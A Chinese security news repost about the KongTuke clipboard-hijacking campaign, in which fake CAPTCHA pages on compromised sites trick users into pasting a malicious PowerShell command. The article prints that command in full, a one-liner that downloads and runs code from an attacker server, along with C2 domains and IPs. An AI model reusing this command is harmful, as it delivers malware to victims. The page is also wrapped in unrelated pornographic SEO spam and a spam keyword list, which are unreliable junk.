99国产精品欲av蜜臀,可以直接免费观看的AV网站,gogogo高清免费完整版,啊灬啊灬啊灬免费毛片

網易首頁 > 網易號 > 正文 申請入駐

【安全圈】“剪貼板劫持”利用偽造的驗證碼通過被黑網站竊取剪貼板數據

0
分享至

關鍵詞

惡意軟件

網絡安全研究人員發現了一種名為“KongTuke”的復雜新型網絡攻擊鏈,它通過入侵合法網站攻擊毫無戒心的互聯網用戶。

Palo Alto Networks 的 Unit 42 團隊的 Bradley Duncan 在一份報告中詳細介紹了此次攻擊,該攻擊利用惡意腳本和偽造的 CAPTCHA 頁面劫持受害者的剪貼板并可能安裝未識別的惡意軟件。

該調查結果于 2025 年 4 月 4 日分享,Unit 42 Intel 在 X 上發布了更多見解,凸顯了此次活動日益增長的威脅。

攻擊鏈

KongTuke 攻擊始于向合法但易受攻擊的網站注入惡意腳本。報告中引用的一個例子是 hxxps://lancasternh[.]com/6t7y.js,它會將用戶重定向到 hxxps://lancasternh[.]com/js.php 上的輔助腳本。

該腳本收集有關受害者設備的詳細信息,包括 IP 地址、瀏覽器類型和引薦來源數據,以 base64 格式編碼。

從那里,用戶會被引導到一個模仿 CAPTCHA 的欺騙性“驗證您是人類”頁面,CAPTCHA 是一種常見的安全功能,旨在區分人類和機器人。

然而,這個 CAPTCHA 是個詭計。該頁面不驗證身份,而是采用一種稱為“剪貼板劫持”或“粘貼劫持”的技術。它會秘密地將惡意的 PowerShell 腳本注入受害者的剪貼板,并附帶指示,敦促用戶通過 Windows 運行窗口粘貼并執行該腳本。

Duncan 詳細描述了該腳本,其內容如下:

powershell -w h -c "iex $(irm 138.199.156[.]22:8080/$($z = [datetime]::UtcNow; $y = ([datetime]('01/01/' + '1970')); $x = ($z - $y).TotalSeconds; $w = [math]::Floor($x); $v = $w - ($w % 16); [int64]$v))"

此命令連接到遠程服務器 138.199.156[.]22:8080,并根據時間戳計算檢索其他惡意負載。

交通和感染后活動

根據 Unit 42 的報告,該腳本一旦執行,就會發起一系列網絡請求。初始流量包括對同一 IP 地址的 GET 和 POST 請求,然后連接到 ecduutcykpvkbim[.]top 和 bfidmcjejlilflg[.]top 等域。

這些托管在 185.250.151[.]155:80 的域名似乎是進一步感染的中轉站。感染后,受感染的系統通過 173.232.146[.]62:25658 與 8qvihxy8x5nyixj[.]top 建立命令和控制 (C2) 通信,使用 TLSv1.0 HTTPS 流量。

有趣的是,受感染的主機還使用 api.ipify[.]org 和 ipinfo[.]io 等服務執行 IP 地址檢查,收集城市、地區和國家/地區等地理位置數據。雖然此步驟本身并不惡意,但它表明攻擊者正在對受害者進行分析,以進行有針對性的利用。

熟悉卻難以捉摸的威脅

網絡安全社區一直在關注 KongTuke 活動,包括 Mastodon 上的 @monitorsg 和 ThreatFox,標簽為 #KongTuke。鄧肯指出,感染后的流量與著名遠程訪問木馬 AsyncRAT 的模式相似。然而,最終的惡意軟件負載仍未確定,因為研究人員尚未獲得樣本進行分析。這種不確定性凸顯了威脅的不斷演變以及打擊威脅的挑戰。

2025 年 4 月 4 日,Unit 42 Intel 通過 X 向公眾發出警告,稱:“在合法但被入侵的網站的頁面中注入 #KongTuke 腳本會導致偽造的 # CAPTCHA樣式頁面和 #ClipboardHijacking(#pastejacking)。

這些頁面要求用戶將惡意腳本粘貼到運行窗口中?!痹撎涌赏ㄟ^ https://x.com/Unit42_Intel/status/1908253830166323637 訪問,其中包含更多詳細信息的鏈接和虛假 CAPTCHA 頁面的圖片,強調了提高認識的緊迫性。

報告作者 Bradley Duncan 在他的筆記中強調了這次攻擊的陰險性:“這個過程有時被稱為‘剪貼板劫持’或‘粘貼劫持’,以例行驗證為幌子誘騙用戶執行有害代碼?!笔褂檬艿礁腥镜暮戏ňW站會增加一層信任,這使得攻擊變得尤為危險。

網絡安全專家敦促用戶在遇到 CAPTCHA 提示時要小心謹慎,尤其是那些要求手動執行腳本的提示。合法的 CAPTCHA 通常涉及圖像選擇等簡單任務,而不是復制和粘貼代碼。用戶還應保持系統更新,避免點擊可疑鏈接,并使用強大的防病毒軟件來檢測和阻止此類威脅。

隨著 KongTuke 活動的不斷發展,Unit 42 及其他機構的研究人員正在努力識別最終的惡意軟件并破壞攻擊基礎設施。目前,警惕仍然是防范這種在日常網絡互動中利用信任的狡猾手段的最佳方法。

來源: https://cybersecuritynews.com/fake-captcha/

安全圈

網羅圈內熱點 專注網絡安全

實時資訊一手掌握!

好看你就分享 有用就點個贊

支持「安全圈」就點個三連吧!

特別聲明:以上內容(如有圖片或視頻亦包括在內)為自媒體平臺“網易號”用戶上傳并發布,本平臺僅提供信息存儲服務。

Notice: The content above (including the pictures and videos if any) is uploaded and posted by a user of NetEase Hao, which is a social media platform and only provides information storage services.

相關推薦
熱點推薦
64歲男子腳后跟疼,半年后突然離世!告誡:腳后跟疼要警惕3種病

64歲男子腳后跟疼,半年后突然離世!告誡:腳后跟疼要警惕3種病

河山銳新聞
2025-05-04 15:41:07
三國軍隊暴揍胡塞武裝

三國軍隊暴揍胡塞武裝

西樓飲月
2025-05-06 17:15:34
德國商會:86%在華德企受中美貿易戰影響 汽車、機械行業尤甚

德國商會:86%在華德企受中美貿易戰影響 汽車、機械行業尤甚

財聯社
2025-05-07 18:50:07
小S獻祭二女兒的瓜!

小S獻祭二女兒的瓜!

八卦瘋叔
2025-05-02 10:01:38
中山市一棟私人自建的獨棟別墅拍賣,200萬就成交了

中山市一棟私人自建的獨棟別墅拍賣,200萬就成交了

天天話事
2025-05-07 14:35:34
阿維塔做夢也想不到,王牌賣點成了尖刀,刺向自己

阿維塔做夢也想不到,王牌賣點成了尖刀,刺向自己

藍字計劃
2025-05-07 17:11:54
關稅這些都是小打小鬧,真正的中美大決戰,決勝于未來五年

關稅這些都是小打小鬧,真正的中美大決戰,決勝于未來五年

詭譎怪談
2025-05-02 15:35:06
447架無人機和導彈襲擊俄本土,“戴好耳塞”到底是什么?

447架無人機和導彈襲擊俄本土,“戴好耳塞”到底是什么?

山河路口
2025-05-07 18:11:06
知名軟件正式停運!有人昨天還在用,網友:要跟很多人失聯了

知名軟件正式停運!有人昨天還在用,網友:要跟很多人失聯了

瀟湘晨報
2025-05-07 09:40:15
餐館老板讓拾荒老者免費吃5年飯,餐館快倒閉之際,老人突然上門

餐館老板讓拾荒老者免費吃5年飯,餐館快倒閉之際,老人突然上門

白云故事
2025-04-30 12:05:12
恒大“二號人物”600億資產遭清算!消失的打工皇帝竟成詐騙頭子

恒大“二號人物”600億資產遭清算!消失的打工皇帝竟成詐騙頭子

保德全
2025-05-07 19:30:03
趙心童家世顯赫!開庫里南+戴百萬名表,父親15年就是深圳醫院院長

趙心童家世顯赫!開庫里南+戴百萬名表,父親15年就是深圳醫院院長

二瘋說球
2025-05-07 08:09:36
上海、長沙、南京:降降降!新一輪樓市政策寬松窗口開啟

上海、長沙、南京:降降降!新一輪樓市政策寬松窗口開啟

21世紀經濟報道
2025-05-07 20:36:23
斯諾克言論爭議!馬克·威廉姆斯質疑中國選手世錦賽,網友炸毛

斯諾克言論爭議!馬克·威廉姆斯質疑中國選手世錦賽,網友炸毛

明月聊史
2025-05-07 08:28:24
馬筱梅懶理出軌風波,曬出婚禮預熱片,婚禮倒計時12天!

馬筱梅懶理出軌風波,曬出婚禮預熱片,婚禮倒計時12天!

說說史事
2025-05-05 23:10:27
不舍!廣州一知名酒樓宣布即將停業!街坊:有太多的回憶……

不舍!廣州一知名酒樓宣布即將停業!街坊:有太多的回憶……

城事特搜
2025-05-07 20:03:36
香港國泰航空空姐誤將白酒當水給3歲男童喝

香港國泰航空空姐誤將白酒當水給3歲男童喝

看看新聞Knews
2025-05-07 15:01:03
馬筱梅回應:網上流傳的照片以及澳門坐臺等傳聞均為不實報道

馬筱梅回應:網上流傳的照片以及澳門坐臺等傳聞均為不實報道

小咪侃娛圈
2025-05-07 09:01:04
烏軍空襲莫斯科庫賓卡機場!是勝利日俄空軍表演隊的基地

烏軍空襲莫斯科庫賓卡機場!是勝利日俄空軍表演隊的基地

項鵬飛
2025-05-07 19:39:23
新鮮出爐的胡說八道,專家教授:馬克思的祖先來自中國

新鮮出爐的胡說八道,專家教授:馬克思的祖先來自中國

歷史總在押韻
2025-05-07 00:10:57
2025-05-07 21:12:49
安全圈
安全圈
國內首家大安全概念新媒體
5522文章數 4686關注度
往期回顧 全部

科技要聞

一紙禁令后,新勢力銷售們賣車套路變了

頭條要聞

女子疑用公筷試吃超市咸菜被抓拍 超市:咸菜下架送檢

頭條要聞

女子疑用公筷試吃超市咸菜被抓拍 超市:咸菜下架送檢

體育要聞

未來是你們這些年輕人的,但現在還不行!

娛樂要聞

出道15年零緋聞,被劉濤贊揚演技的他

財經要聞

信息量巨大,這次放水完全不一樣

汽車要聞

《臺州宣言》再進一步 吉利汽車將全資控股極氪

態度原創

教育
家居
親子
公開課
軍事航空

教育要聞

溫州日報作文版作文選登:鄭勛耀《和爺爺的乒乓球賽》

家居要聞

平和心境 蘇式園林格調

親子要聞

父親的神奇與不解之謎

公開課

李玫瑾:為什么性格比能力更重要?

軍事要聞

巴基斯坦與印度在巴控克什米爾發生交火

無障礙瀏覽 進入關懷版 主站蜘蛛池模板: 绩溪县| 夏邑县| 龙门县| 平罗县| 平谷区| 蓬溪县| 渝北区| 化德县| 深泽县| 河曲县| 乐山市| 重庆市| 修文县| 天全县| 敦化市| 富宁县| 富民县| 寻甸| 伽师县| 沙洋县| 定兴县| 南平市| 普洱| 八宿县| 万全县| 陵川县| 阿尔山市| 珠海市| 蒙阴县| 巴塘县| 合山市| 门头沟区| 潜山县| 崇仁县| 望奎县| 晋江市| 子长县| 张家口市| 新安县| 辛集市| 清新县|